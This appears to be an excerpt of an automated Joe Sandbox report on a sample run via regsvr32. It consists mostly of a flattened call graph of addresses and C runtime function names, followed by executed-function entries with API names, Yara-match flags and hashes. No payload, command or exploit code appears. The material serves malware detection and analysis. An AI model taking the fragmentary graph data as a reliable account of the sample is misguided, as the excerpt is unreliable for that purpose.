8427->8426 8431 2246af5 8427->8431 8432 2246abe 8427->8432 8427->8441 8433 2241468 Is_bad_exception_allowed ExitProcess 8428->8433 8434 2246b49 8428->8434 8429->8441 8430->8441 8431->8426 8436 2246acd 8431->8436 8435 2245de0 __GSHandlerCheck_EH ExitProcess 8432->8435 8433->8434 8434->8424 8438 2241494 __GSHandlerCheck_EH ExitProcess 8434->8438 8434->8441 8435->8436 8437 2246c41 8436->8437 8439 2246adf 8436->8439 8440 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8437->8440 8438->8424 8443 2245ee4 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8439->8443 8442 2246c46 8440->8442 8441->8419 8443->8441 8543 223ddfd 8544 223de04 8543->8544 8545 223f678 ExitProcess 8544->8545 8548 223de19 __free_lconv_mon 8544->8548 8546 223de22 8545->8546 8547 223df38 ExitProcess 8546->8547 8546->8548 8547->8548 8507 223f3bc 8508 223f3cc Concurrency::details::SchedulerProxy::DeleteThis 8507->8508 8513 2243608 8508->8513 8510 223f3d5 8512 223f3de Concurrency::details::SchedulerProxy::DeleteThis 8510->8512 8517 223f438 8510->8517 8514 2243627 _set_fmode 8513->8514 8516 2243638 Concurrency::details::SchedulerProxy::DeleteThis 8513->8516 8515 2240344 _invalid_parameter_noinfo ExitProcess 8514->8515 8515->8516 8516->8510 8518 223f45e 8517->8518 8519 2243608 ExitProcess 8518->8519 8520 223f496 8518->8520 8519->8520 8520->8512 7828 2246000 7840 2245f33 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7828->7840 7829 2246027 7845 223e560 7829->7845 7832 2246062 7833 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7832->7833 7835 2246037 7833->7835 7834 2246044 __FrameHandler3::GetHandlerSearchState 7835->7834 7837 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7835->7837 7836 223e560 __CxxCallCatchBlock ExitProcess 7836->7835 7838 224606d 7837->7838 7839 2241468 ExitProcess Is_bad_exception_allowed 7839->7840 7840->7829 7840->7832 7840->7839 7842 224147c 7840->7842 7843 223e560 __CxxCallCatchBlock ExitProcess 7842->7843 7844 224148a 7843->7844 7844->7840 7846 223e569 __CxxCallCatchBlock 7845->7846 7847 223e56e 7846->7847 7848 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7846->7848 7847->7835 7847->7836 7849 223e578 7848->7849 8521 2248580 8522 22485b8 8521->8522 8523 22485e4 8522->8523 8525 2241550 8522->8525 8526 223e560 __CxxCallCatchBlock ExitProcess 8525->8526 8527 224157a 8526->8527 8528 223e560 __CxxCallCatchBlock ExitProcess 8527->8528 8529 2241587 8528->8529 8530 223e560 __CxxCallCatchBlock ExitProcess 8529->8530 8531 2241590 8530->8531 8532 2246608 __GSHandlerCheck_EH 2 API calls 8531->8532 8533 22415c1 8532->8533 8533->8523 7850 2246202 7851 223e560 __CxxCallCatchBlock ExitProcess 7850->7851 7852 224620f __CxxCallCatchBlock 7851->7852 7861 22414fc 7852->7861 7854 223e560 __CxxCallCatchBlock ExitProcess 7855 22462be 7854->7855 7857 223e560 __CxxCallCatchBlock ExitProcess 7855->7857 7859 22462c7 7857->7859 7860 22462ab __CxxCallCatchBlock 7860->7854 7862 223e560 __CxxCallCatchBlock ExitProcess 7861->7862 7863 224150e 7862->7863 7864 2241549 7863->7864 7865 223e560 __CxxCallCatchBlock ExitProcess 7863->7865 7866 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7864->7866 7867 2241519 7865->7867 7868 224154e 7866->7868 7867->7864 7869 2241535 7867->7869 7870 223e560 __CxxCallCatchBlock ExitProcess 7869->7870 7871 224153a 7870->7871 7871->7860 7872 223cde8 7871->7872 7873 223e560 __CxxCallCatchBlock ExitProcess 7872->7873 7874 223cdf6 7873->7874 7874->7860 8444 224ab42 8445 223e560 __CxxCallCatchBlock ExitProcess 8444->8445 8446 224ab50 8445->8446 8447 224ab5b 8446->8447 8448 223e560 __CxxCallCatchBlock ExitProcess 8446->8448 8448->8447 8369 2246108 8370 223e560 __CxxCallCatchBlock ExitProcess 8369->8370 8371 224613d 8370->8371 8372 223e560 __CxxCallCatchBlock ExitProcess 8371->8372 8373 224614b __except_validate_context_record 8372->8373 8374 223e560 __CxxCallCatchBlock ExitProcess 8373->8374 8375 224618f 8374->8375 8376 223e560 __CxxCallCatchBlock ExitProcess 8375->8376 8377 2246198 8376->8377 8378 223e560 __CxxCallCatchBlock ExitProcess 8377->8378 8379 22461a1 8378->8379 8392 22414c0 8379->8392 8382 223e560 __CxxCallCatchBlock ExitProcess 8383 22461d1 __CxxCallCatchBlock 8382->8383 8384 22414fc __CxxCallCatchBlock ExitProcess 8383->8384 8388 2246282 8384->8388 8385 22462ab __CxxCallCatchBlock 8386 223e560 __CxxCallCatchBlock ExitProcess 8385->8386 8387 22462be 8386->8387 8389 223e560 __CxxCallCatchBlock ExitProcess 8387->8389 8388->8385 8390 223cde8 __CxxCallCatchBlock ExitProcess 8388->8390 8391 22462c7 8389->8391 8390->8385 8393 223e560 __CxxCallCatchBlock ExitProcess 8392->8393 8394 22414d1 8393->8394 8395 22414dc 8394->8395 8396 223e560 __CxxCallCatchBlock ExitProcess 8394->8396 8397 223e560 __CxxCallCatchBlock ExitProcess 8395->8397 8396->8395 8398 22414ed 8397->8398 8398->8382 8398->8383 7875 2246a0a 7876 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7875->7876 7877 2246a0f __except_validate_context_record 7876->7877 7878 223e560 __CxxCallCatchBlock ExitProcess 7877->7878 7879 2246a42 7878->7879 7882 2246a9c 7879->7882 7883 2246b2a 7879->7883 7896 2246af0 7879->7896 7880 2246b98 7880->7896 7937 2246c48 7880->7937 7881 2246b17 7922 22410fc 7881->7922 7882->7881 7886 2246af5 7882->7886 7887 2246abe 7882->7887 7882->7896 7889 2246b49 7883->7889 7931 2241468 7883->7931 7886->7881 7891 2246acd 7886->7891 7899 2245de0 7887->7899 7889->7880 7889->7896 7934 2241494 7889->7934 7892 2246c41 7891->7892 7894 2246adf 7891->7894 7895 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7892->7895 7905 2245ee4 7894->7905 7897 2246c46 7895->7897 7900 2245e40 7899->7900 7901 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7900->7901 7902 2245e45 7901->7902 7903 2245e6a 7902->7903 7904 2245de0 __GSHandlerCheck_EH ExitProcess 7902->7904 7903->7891 7904->7903 7906 2241468 Is_bad_exception_allowed ExitProcess 7905->7906 7907 2245f13 __GetCurrentState 7906->7907 7908 223e560 __CxxCallCatchBlock ExitProcess 7907->7908 7920 2245f30 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7908->7920 7909 2246027 7910 223e560 __CxxCallCatchBlock ExitProcess 7909->7910 7911 224602c 7910->7911 7914 223e560 __CxxCallCatchBlock ExitProcess 7911->7914 7917 2246037 7911->7917 7912 2246062 7913 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7912->7913 7913->7917 7914->7917 7915 2241468 ExitProcess Is_bad_exception_allowed 7915->7920 7916 2246044 __FrameHandler3::GetHandlerSearchState 7916->7896 7917->7916 7918 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7917->7918 7919 224606d 7918->7919 7920->7909 7920->7912 7920->7915 7921 224147c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7920->7921 7921->7920 7992 2241160 7922->7992 7929 2245ee4 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 7930 2241150 7929->7930 7930->7896 7932 223e560 __CxxCallCatchBlock ExitProcess 7931->7932 7933 2241471 7932->7933 7933->7889 7935 223e560 __CxxCallCatchBlock ExitProcess 7934->7935 7936 224149d 7935->7936 7936->7880 8005 2246070 7937->8005 7939 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7940 2247115 7939->7940 7941 2247060 7943 2247022 __GSHandlerCheck_EH 7941->7943 7977 22470a2 7941->7977 8065 22471ec 7941->8065 7942 2246d8e 7942->7941 7944 2246dc6 7942->7944 7946 223e560 __CxxCallCatchBlock ExitProcess 7943->7946 7947 2246f8d 7944->7947 8033 2241334 7944->8033 7946->7977 7947->7943 7953 2246fae 7947->7953 7954 2241468 Is_bad_exception_allowed ExitProcess 7947->7954 7948 223e560 __CxxCallCatchBlock ExitProcess 7951 2246cf5 7948->7951 7952 22470a9 _log10_special 7951->7952 7955 223e560 __CxxCallCatchBlock ExitProcess 7951->7955 7952->7896 7953->7943 7958 2246fd0 7953->7958 8060 22410d0 7953->8060 7954->7953 7957 2246d05 7955->7957 7960 223e560 __CxxCallCatchBlock ExitProcess 7957->7960 7958->7943 7961 2246fe6 7958->7961 7990 22470f2 7958->7990 7959 2246df5 7959->7947 7968 2241494 ExitProcess __GSHandlerCheck_EH 7959->7968 8039 2246610 7959->8039 8053 2247118 7959->8053 7962 2246d0e 7960->7962 7963 2246ff1 7961->7963 7966 2241468 Is_bad_exception_allowed ExitProcess 7961->7966 8017 22414a8 7962->8017 7969 2246490 __GSHandlerCheck_EH ExitProcess 7963->7969 7964 223e560 __CxxCallCatchBlock ExitProcess 7967 22470f8 7964->7967 7966->7963 7970 223e560 __CxxCallCatchBlock ExitProcess 7967->7970 7968->7959 7974 2247008 7969->7974 7972 2247101 7970->7972 7971 223e560 __CxxCallCatchBlock ExitProcess 7976 2246d50 7971->7976 7973 223e300 __GSHandlerCheck_EH ExitProcess 7972->7973 7973->7977 7974->7943 7978 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7974->7978 7976->7942 7979 223e560 __CxxCallCatchBlock ExitProcess 7976->7979 7977->7939 7977->7952 7978->7943 7980 2246d5c 7979->7980 7982 223e560 __CxxCallCatchBlock ExitProcess 7980->7982 7983 2246d65 7982->7983 8020 2246490 7983->8020 7987 2246d79 8029 2246580 7987->8029 7989 223e300 __GSHandlerCheck_EH ExitProcess 7989->7990 7990->7964 7991 2246d81 __CxxCallCatchBlock std::bad_alloc::bad_alloc __GSHandlerCheck_EH 7991->7989 7993 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7992->7993 7994 224111b 7993->7994 7995 2245dd8 7994->7995 7996 2245de0 7995->7996 7997 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7996->7997 7998 2245e45 7997->7998 7999 2241129 7998->7999 8000 2245de0 __GSHandlerCheck_EH ExitProcess 7998->8000 8001 224106c 7999->8001 8000->7999 8002 22410b7 8001->8002 8004 224108c 8001->8004 8002->7929 8003 223e560 __CxxCallCatchBlock ExitProcess 8003->8004 8004->8002 8004->8003 8006 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8005->8006 8007 2246095 8006->8007 8008 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8007->8008 8009 22460aa 8008->8009 8082 2245eb8 8009->8082 8012 22460bc __FrameHandler3::GetHandlerSearchState 8085 2245e7c 8012->8085 8013 22460df 8014 2245eb8 __GetUnwindTryBlock ExitProcess 8013->8014 8015 22460dd 8014->8015 8015->7942 8015->7948 8015->7977 8018 223e560 __CxxCallCatchBlock ExitProcess 8017->8018 8019 22414b6 8018->8019 8019->7971 8019->7977 8021 2246577 8020->8021 8028 22464bb 8020->8028 8023 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8021->8023 8022 2246557 8022->7942 8022->7987 8025 224657c 8023->8025 8024 2241494 ExitProcess __GSHandlerCheck_EH 8024->8028 8026 2241468 Is_bad_exception_allowed ExitProcess 8026->8028 8027 2246610 __GSHandlerCheck_EH ExitProcess 8027->8028 8028->8022 8028->8024 8028->8026 8028->8027 8030 22465ed 8029->8030 8032 224659d Is_bad_exception_allowed 8029->8032 8030->7991 8031 2241468 ExitProcess Is_bad_exception_allowed 8031->8032 8032->8030 8032->8031 8034 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8033->8034 8035 2241372 8034->8035 8036 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8035->8036 8038 2241380 8035->8038 8037 2241464 8036->8037 8038->7959 8040 22466cc 8039->8040 8041 224663d 8039->8041 8040->7959 8042 2241468 Is_bad_exception_allowed ExitProcess 8041->8042 8043 2246646 8042->8043 8043->8040 8044 2241468 Is_bad_exception_allowed ExitProcess 8043->8044 8045 224665f 8043->8045 8044->8045 8045->8040 8046 224668b 8045->8046 8047 2241468 Is_bad_exception_allowed ExitProcess 8045->8047 8048 2241494 __GSHandlerCheck_EH ExitProcess 8046->8048 8047->8046 8049 224669f 8048->8049 8049->8040 8050 22466b8 8049->8050 8051 2241468 Is_bad_exception_allowed ExitProcess 8049->8051 8052 2241494 __GSHandlerCheck_EH ExitProcess 8050->8052 8051->8050 8052->8040 8054 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8053->8054 8055 2247155 8054->8055 8056 224717b 8055->8056 8088 2246950 8055->8088 8058 2241468 Is_bad_exception_allowed ExitProcess 8056->8058 8059 224718d __GSHandlerCheck_EH 8058->8059 8059->7959 8061 2245dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8060->8061 8062 22410e4 8061->8062 8063 224106c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8062->8063 8064 22410ee 8063->8064 8064->7958 8066 2247225 8065->8066 8067 2247438 8065->8067 8068 223e560 __CxxCallCatchBlock ExitProcess 8066->8068 8067->7943 8069 224722a 8068->8069 8070 224729c 8069->8070 8076 223e560 __CxxCallCatchBlock ExitProcess 8069->8076 8070->8067 8071 2247453 8070->8071 8072 22472bc 8070->8072 8074 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8071->8074 8073 2241334 __GSHandlerCheck_EH ExitProcess 8072->8073 8081 22472de 8073->8081 8075 2247458 8074->8075 8077 2247259 8076->8077 8077->8070 8120 22415d8 8077->8120 8079 2241468 ExitProcess Is_bad_exception_allowed 8079->8081 8080 2247118 __GSHandlerCheck_EH ExitProcess 8080->8081 8081->8067 8081->8079 8081->8080 8083 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8082->8083 8084 2245ecb 8083->8084 8084->8012 8084->8013 8086 2241160 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8085->8086 8087 2245e96 8086->8087 8087->8015 8089 2246972 8088->8089 8097 2246750 8089->8097 8091 2246983 8092 22469c4 __AdjustPointer 8091->8092 8093 2246988 __AdjustPointer 8091->8093 8094 2241494 __GSHandlerCheck_EH ExitProcess 8092->8094 8096 22469a7 __GSHandlerCheck_EH 8092->8096 8095 2241494 __GSHandlerCheck_EH ExitProcess 8093->8095 8093->8096 8094->8096 8095->8096 8096->8056 8098 224677d 8097->8098 8100 2246786 8097->8100 8099 2241468 Is_bad_exception_allowed ExitProcess 8098->8099 8099->8100 8101 2241468 Is_bad_exception_allowed ExitProcess 8100->8101 8102 22467a5 8100->8102 8110 2246808 __AdjustPointer __GSHandlerCheck_EH 8100->8110 8101->8102 8103 22467f0 8102->8103 8104 2246810 8102->8104 8102->8110 8106 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8103->8106 8103->8110 8105 2241494 __GSHandlerCheck_EH ExitProcess 8104->8105 8107 224688f 8104->8107 8104->8110 8105->8107 8108 2246947 8106->8108 8107->8110 8111 2241494 __GSHandlerCheck_EH ExitProcess 8107->8111 8109 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8108->8109 8112 224694d 8109->8112 8110->8091 8111->8110 8113 2246750 __GSHandlerCheck_EH ExitProcess 8112->8113 8114 2246983 8113->8114 8115 22469c4 __AdjustPointer 8114->8115 8116 2246988 __AdjustPointer 8114->8116 8117 2241494 __GSHandlerCheck_EH ExitProcess 8115->8117 8119 22469a7 __GSHandlerCheck_EH 8115->8119 8118 2241494 __GSHandlerCheck_EH ExitProcess 8116->8118 8116->8119 8117->8119 8118->8119 8119->8091 8121 223e560 __CxxCallCatchBlock ExitProcess 8120->8121 8122 2241604 8121->8122 8122->8070 8399 2246310 8402 2248840 8399->8402 8401 2246339 8403 2248861 8402->8403 8404 2248896 __std_exception_copy 8402->8404 8403->8404 8405 223e688 __std_exception_copy ExitProcess 8403->8405 8404->8401 8405->8404 7560 223c1d4 7579 223c4a8 7560->7579 7563 223c233 7567 223c1e8 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 7567->7560 7567->7563 7569 223c2e5 7567->7569 7573 2209a30 7567->7573 7583 223d198 7567->7583 7588 223dd48 7567->7588 7602 223d160 7567->7602 7607 223d16c 7567->7607 7570 223c2ef 7569->7570 7593 223d178 7569->7593 7598 223c4e4 7570->7598 7574 2209a49 CreateThread 7573->7574 7577 2209a87 __scrt_get_show_window_mode 7574->7577 7612 220bdb0 7574->7612 7576 2209e10 GetLocaleInfoA 7576->7577 7577->7576 7578 220a200 __std_exception_copy __scrt_get_show_window_mode 7577->7578 7578->7567 7580 223c4b0 7579->7580 7581 223c4bc __scrt_dllmain_crt_thread_attach 7580->7581 7582 223c4c5 7581->7582 7582->7567 7584 223d1d0 7583->7584 7585 223d1af 7583->7585 7616 223e300 7584->7616 7585->7567 7664 223f678 7588->7664 7590 223dd9d 7590->7567 7591 223dd57 7591->7590 7670 22430cc 7591->7670 7597 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7593->7597 7594 223d35a 7594->7570 7596 223d36c 7597->7594 7765 223d274 7597->7765 7599 223c4f5 7598->7599 7601 223c4fe 7599->7601 7769 223d094 7599->7769 7601->7563 7603 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7602->7603 7604 223d35a 7603->7604 7605 223d274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7603->7605 7604->7567 7606 223d36c 7605->7606 7611 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7607->7611 7608 223d35a 7608->7567 7609 223d274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7610 223d36c 7609->7610 7611->7608 7611->7609 7613 220c56d 7612->7613 7614 220c833 MessageBoxA 7613->7614 7615 220ce27 7613->7615 7614->7613 7614->7615 7621 223ed44 7616->7621 7622 223ed59 _set_fmode __free_lconv_mon 7621->7622 7623 223e309 7622->7623 7624 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7622->7624 7626 223e49c 7623->7626 7625 223ee16 7624->7625 7627 223e4a5 __FrameHandler3::FrameUnwindToEmptyState 7626->7627 7628 223e4b4 __FrameHandler3::FrameUnwindToEmptyState 7627->7628 7632 2240868 7627->7632 7630 223d16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7628->7630 7631 223e4f1 7630->7631 7634 2240898 _set_fmode 7632->7634 7635 22408bf Concurrency::details::SchedulerProxy::DeleteThis 7632->7635 7633 22408fc 7633->7628 7634->7633 7634->7635 7637 2240941 _set_fmode 7634->7637 7636 2240ac8 Concurrency::details::SchedulerProxy::DeleteThis 7635->7636 7639 22409c2 7635->7639 7641 22409fb Concurrency::details::SchedulerProxy::DeleteThis 7635->7641 7638 223d16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7636->7638 7650 2240344 7637->7650 7640 2240adf 7638->7640 7639->7641 7643 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7639->7643 7644 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7641->7644 7647 2240a70 7641->7647 7649 2240a5f 7641->7649 7645 22409eb 7643->7645 7644->7647 7646 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7645->7646 7646->7641 7648 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7647->7648 7647->7649 7648->7649 7649->7628 7653 22406fc 7650->7653 7654 2240727 _invalid_parameter_noinfo 7653->7654 7655 2240771 7654->7655 7659 22405dc 7654->7659 7656 224035d 7655->7656 7658 22405dc _invalid_parameter_noinfo ExitProcess 7655->7658 7656->7633 7658->7656 7660 224062f 7659->7660 7661 22405ef _invalid_parameter_noinfo 7659->7661 7660->7655 7661->7660 7662 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7661->7662 7663 2240642 7662->7663 7665 223f685 7664->7665 7669 223f6ca 7664->7669 7674 223ee18 7665->7674 7667 223f6b4 7679 223fc04 7667->7679 7669->7591 7671 22430e0 7670->7671 7672 223f6d8 ExitProcess 7671->7672 7673 2243104 7672->7673 7673->7591 7677 223ee29 _set_fmode __free_lconv_mon 7674->7677 7675 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7676 223eeb9 7675->7676 7677->7675 7678 223ee3c _set_fmode __free_lconv_mon 7677->7678 7678->7667 7688 223fb4c 7679->7688 7681 223fc39 7701 223fa34 7681->7701 7683 223fc40 7686 223fc56 _set_fmode __free_lconv_mon 7683->7686 7704 223f774 7683->7704 7685 223fd71 __free_lconv_mon 7685->7686 7709 224005c 7685->7709 7686->7669 7691 223fb6f Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7688->7691 7689 223fbeb 7689->7681 7690 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7692 223fc03 7690->7692 7691->7689 7691->7690 7693 223fb4c ExitProcess 7692->7693 7694 223fc39 7693->7694 7695 223fa34 ExitProcess 7694->7695 7696 223fc40 7695->7696 7697 223f774 ExitProcess 7696->7697 7699 223fc56 _set_fmode __free_lconv_mon 7696->7699 7698 223fd71 __free_lconv_mon 7697->7698 7698->7699 7700 224005c ExitProcess 7698->7700 7699->7681 7700->7699 7715 223f6d8 7701->7715 7705 223fa34 ExitProcess 7704->7705 7708 223f7a1 __scrt_get_show_window_mode 7705->7708 7706 223f8f7 _log10_special 7706->7685 7708->7706 7751 223fe74 7708->7751 7710 2240078 _set_fmode Concurrency::details::SchedulerProxy::DeleteThis __scrt_get_show_window_mode 7709->7710 7711 2240344 _invalid_parameter_noinfo ExitProcess 7710->7711 7712 22400a5 _set_fmode __scrt_get_show_window_mode 7710->7712 7711->7712 7713 2240344 _invalid_parameter_noinfo ExitProcess 7712->7713 7714 2240157 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7712->7714 7713->7714 7714->7686 7716 223f6f7 7715->7716 7717 223f6fc 7715->7717 7716->7683 7717->7716 7718 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7717->7718 7719 223f717 7718->7719 7723 2244e18 7719->7723 7724 2244e2d 7723->7724 7726 223f73a 7723->7726 7724->7726 7731 22422c8 7724->7731 7727 2244e4c 7726->7727 7728 2244e74 7727->7728 7729 2244e61 7727->7729 7728->7716 7729->7728 7737 223f65c 7729->7737 7732 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7731->7732 7734 22422d7 Concurrency::details::SchedulerProxy::DeleteThis 7732->7734 7733 2242322 7733->7726 7734->7733 7735 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7734->7735 7736 2242335 7735->7736 7738 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7737->7738 7742 223f665 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 7738->7742 7739 223fbeb 7739->7728 7740 223e49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7741 223fc03 7740->7741 7743 223fb4c ExitProcess 7741->7743 7742->7739 7742->7740 7744 223fc39 7743->7744 7745 223fa34 ExitProcess 7744->7745 7746 223fc40 7745->7746 7747 223f774 ExitProcess 7746->7747 7749 223fc56 _set_fmode __free_lconv_mon 7746->7749 7748 223fd71 __free_lconv_mon 7747->7748 7748->7749 7750 224005c ExitProcess 7748->7750 7749->7728 7750->7749 7752 223feb1 7751->7752 7758 223ffa7 _log10_special 7751->7758 7752->7758 7759 2241d74 7752->7759 7754 223ff3b 7762 2244a4c 7754->7762 7756 223ff6e 7757 2244a4c ExitProcess 7756->7757 7757->7758 7758->7706 7760 223f6d8 ExitProcess 7759->7760 7761 2241db6 _log10_special __free_lconv_mon __scrt_get_show_window_mode 7760->7761 7761->7754 7763 223f6d8 ExitProcess 7762->7763 7764 2244a71 7763->7764 7764->7756 7766 223d281 __FrameHandler3::FrameUnwindToEmptyState 7765->7766 7767 223d29d ExitProcess 7766->7767 7768 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 7767->7768 7768->7596 7770 223d09c 7769->7770 7773 223d0b2 7769->7773 7771 223d0ab 7770->7771 7774 2240b2c 7770->7774 7771->7601 7773->7601 7775 2240c94 7774->7775 7777 2240d90 7775->7777 7778 2240daf Concurrency::details::SchedulerProxy::DeleteThis 7777->7778 7779 2240e59 Concurrency::details::SchedulerProxy::DeleteThis 7778->7779 7781 2240cf4 7778->7781 7783 2240d11 7781->7783 7782 2240d41 7782->7778 7783->7782 7785 2240b34 7783->7785 7786 2240b67 7785->7786 7787 2240b87 7786->7787 7788 2240b7c 7786->7788 7802 2240c08 7787->7802 7800 2240c94 7788->7800 7791 2240b90 7792 2240b83 7791->7792 7806 2245028 7791->7806 7793 2240bdc 7792->7793 7795 22405dc _invalid_parameter_noinfo ExitProcess 7792->7795 7796 2240bf1 7793->7796 7798 22405dc _invalid_parameter_noinfo ExitProcess 7793->7798 7795->7793 7796->7782 7798->7796 7801 2240d90 ExitProcess 7800->7801 7803 2240c2e 7802->7803 7805 2240c4f 7802->7805 7804 2245028 ExitProcess 7803->7804 7803->7805 7804->7805 7805->7791 7807 2240bac 7806->7807 7808 2245031 _set_fmode 7806->7808 7810 2244f08 7807->7810 7809 2240344 _invalid_parameter_noinfo ExitProcess 7808->7809 7809->7807 7811 2244f25 7810->7811 7813 2244f18 _set_fmode 7810->7813 7812 2244f81 _set_fmode 7811->7812 7814 2244f54 7811->7814 7815 2240344 _invalid_parameter_noinfo ExitProcess 7812->7815 7813->7792 7817 2244f9c 7814->7817 7815->7813 7818 2244fb8 7817->7818 7820 2244fe7 _set_fmode 7818->7820 7821 22433dc 7818->7821 7820->7813 7822 22433fa _set_fmode 7821->7822 7823 22433e5 _set_fmode 7821->7823 7822->7823 7824 2240344 _invalid_parameter_noinfo ExitProcess 7822->7824 7823->7820 7824->7823 8552 223cdd8 8553 223e300 __GSHandlerCheck_EH ExitProcess 8552->8553 8554 223cde1 8553->8554 8192 2240a98 8194 2240aa6 8192->8194 8193 2240a5f 8194->8193 8195 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8194->8195 8195->8193 8534 2243798 8536 22437ad 8534->8536 8535 22437c0 8536->8535 8537 223e560 __CxxCallCatchBlock ExitProcess 8536->8537 8538 22437d0 8537->8538 8539 223e560 __CxxCallCatchBlock ExitProcess 8538->8539 8540 22437d9 8539->8540 8541 223e300 __GSHandlerCheck_EH ExitProcess 8540->8541 8542 22437e2 8541->8542

                  Executed Functions

                  Function 02209A30 Relevance: 9.0, APIs: 2, Strings: 1, Instructions: 3726threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInfoLocaleThread
                  • String ID: 5
                  • API String ID: 899703944-2226203566
                  • Opcode ID: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                  • Instruction ID: 15b43e84139520742684572fc7cbcfb6fc13bbb6129de3d58c8df81ebeaf2d65
                  • Opcode Fuzzy Hash: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                  • Instruction Fuzzy Hash: 4313D56BBA55140BBB0C88B699A33E773C7D3D6719F29B13D89C3C3587DCAA480B0585
                  Function 0220BDB0 Relevance: 3.2, APIs: 1, Instructions: 1733windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 85 220bdb0-220c567 86 220c790-220c827 85->86 87 220c56d-220c572 85->87 89 220c833-220cdfe MessageBoxA 86->89 90 220c829-220c82d 86->90 87->86 88 220c578-220c78e 87->88 88->86 92 220ce00-220ce08 89->92 93 220ce27-220ce37 89->93 90->89 91 220ce0a-220ce22 90->91 91->89 92->91 92->93
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message
                  • String ID:
                  • API String ID: 2030045667-0
                  • Opcode ID: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                  • Instruction ID: 9ab14b140fcc22c342accee5e86b6d7d010e6a70cf04748c5b8a827f8dfba4db
                  • Opcode Fuzzy Hash: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                  • Instruction Fuzzy Hash: 2B92C46BBF55000BAB0C88B699A73F323C7D396719F29B53D45D7C3152ECAE884B0585
                  Function 0223D274 Relevance: 1.6, APIs: 1, Instructions: 93COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
